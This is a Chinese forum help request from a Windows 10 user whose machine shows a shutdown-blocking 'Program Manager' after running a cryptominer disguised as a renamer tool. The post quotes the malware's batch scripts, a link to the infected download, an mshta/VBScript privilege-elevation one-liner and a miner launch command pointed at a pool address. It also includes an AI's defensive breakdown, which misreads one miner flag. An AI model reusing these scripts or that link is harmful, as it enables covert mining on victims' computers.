Program Manager阻止关机或重启
自从2025年7月8日运行了来自他人的恶意挖矿程序(
https://www.mediafire.com/file/xhmj7o8rrh8v1l4/CHB_ReNamer_v2.7z/file,请不要下载这个文件,因为它是恶意挖矿程序)
起,在关机或重启windows 10时,总会在关机或重启的蓝屏界面显示“Program Manager 这个程序阻止你关机。”
·已使用msconfig禁用所有非Microsoft服务,选择“有选择的启动——加载启动项”,无用;
·已使用任务管理器禁用所有启动项,无用;
·未下载过QQ输入法;
·已在注册表内查找过“Program Manager”“programmanager”,都没有结果;
·Windows Defender已经进行过完全扫描,发现的问题都处理过后,仍然存在阻止关机的这个问题;
之前使用gpedit.msc已经启用“关闭会阻止或取消关机的应用程序的自动终止功能”,再加上在regedit的HKEY_USERS.DEFAULT\Control Panel\Desktop里新建字符串值AutoEndTasks将值设置为1,能够不被它阻止地关机或重启。但是仍觉得眼不见仍然不净,想要彻底将它除掉。请求解决办法。
附上AI对于挖矿程序的解读:
我:
@璐村惂鐢ㄦ埛_000076K馃惥 off
PUSHD %~DP0 & cd /d "%~dp0"
%1 %2
config.exe -n "license.exe" >nul
move /y x64Hider.exe ../x64.exe >nul 2>nul
taskkill /f /im conhost.exe
exit
AI:
This batch script appears to be performing several operations, some of which seem suspicious. Let me break down what it's doing:
@echo off - Turns off command echoing for cleaner output
PUSHD %~DP0 & cd /d "%~dp0" - Changes to the directory where the script is located
%1 %2 - Executes any arguments passed to the script
Runs config.exe with parameters to create/modify license.exe (output is hidden)
Moves x64Hider.exe to parent directory as x64.exe (output is hidden)
Force kills conhost.exe (console host process)
Exits
Red flags/warning signs:
The script hides all output (>nul and 2>nul)
It's modifying/creating executable files
It's killing system processes (conhost.exe)
There's a lot of whitespace, possibly to obscure the code
The naming ("Hider") suggests hiding activity
This appears to be part of some software license manipulation or potentially malicious activity. I would strongly advise against running unknown scripts like this as they could:
Modify system files
Install malware
Bypass software licensing
Disable security features
If you encountered this unexpectedly, you should scan your system with antivirus software.
我:
@echo off
PUSHD %~DP0 & cd /d "%~dp0"
%1 %2
mshta vbscript:createobject("shell.application").shellexecute("%~s0","goto :target","","runas",1)(window.close)&goto :eof
:target
taskkill /f /t /im license.exe >nul 2>nul
license.exe -o 188.116.22.105:35516 -t 3 -B --cpu-priority=0
AI:
This script is highly suspicious and appears to be part of a cryptocurrency mining malware or a trojan. Here's what it does:
Breakdown of the Script:
Elevates Privileges (Runs as Admin):
batch
mshta vbscript:createobject("shell.application").shellexecute("%~s0","goto :target","","runas",1)(window.close)&goto :eof
Uses mshta + VBScript to re-launch itself with admin rights (runas).
This allows it to bypass user permissions.
Kills Existing Miner Process:
batch
taskkill /f /t /im license.exe >nul 2>nul
Forcefully terminates any existing license.exe (likely a disguised miner).
Starts a Hidden Cryptocurrency Miner:
batch
license.exe -o 188.116.22.105:35516 -t 3 -B --cpu-priority=0
license.exe is not a legitimate license manager—it's a miner (likely XMRig or similar).
Connects to a remote server (188.116.22.105:35516) to mine cryptocurrency.
-t 3 → Uses 3 CPU threads.
-B → Runs in the background (hidden).
--cpu-priority=0 → Maximizes CPU usage for mining.
Why This Is Dangerous:
Secretly uses your CPU to mine cryptocurrency for an attacker.
Slows down your PC due to high CPU usage.
Hides itself (no visible windows, output suppressed with >nul).
Persistence: Likely installed to run at startup.
Network activity: Communicates with a remote server (potential backdoor).
What You Should Do:
Do NOT run this script.
Scan your system with:
Malwarebytes (
https://www.malwarebytes.com)
HitmanPro (
https://www.hitmanpro.com)
Windows Defender (Full scan)
Check Task Manager for suspicious processes (license.exe, high CPU usage).
Block the IP 188.116.22.105 in your firewall (if already infected).
Remove the files (license.exe, config.exe, x64Hider.exe).
Conclusion:
This is malware designed to turn your computer into a crypto miner without your consent. If you found this on your system, you are likely infected. Take immediate action to remove it.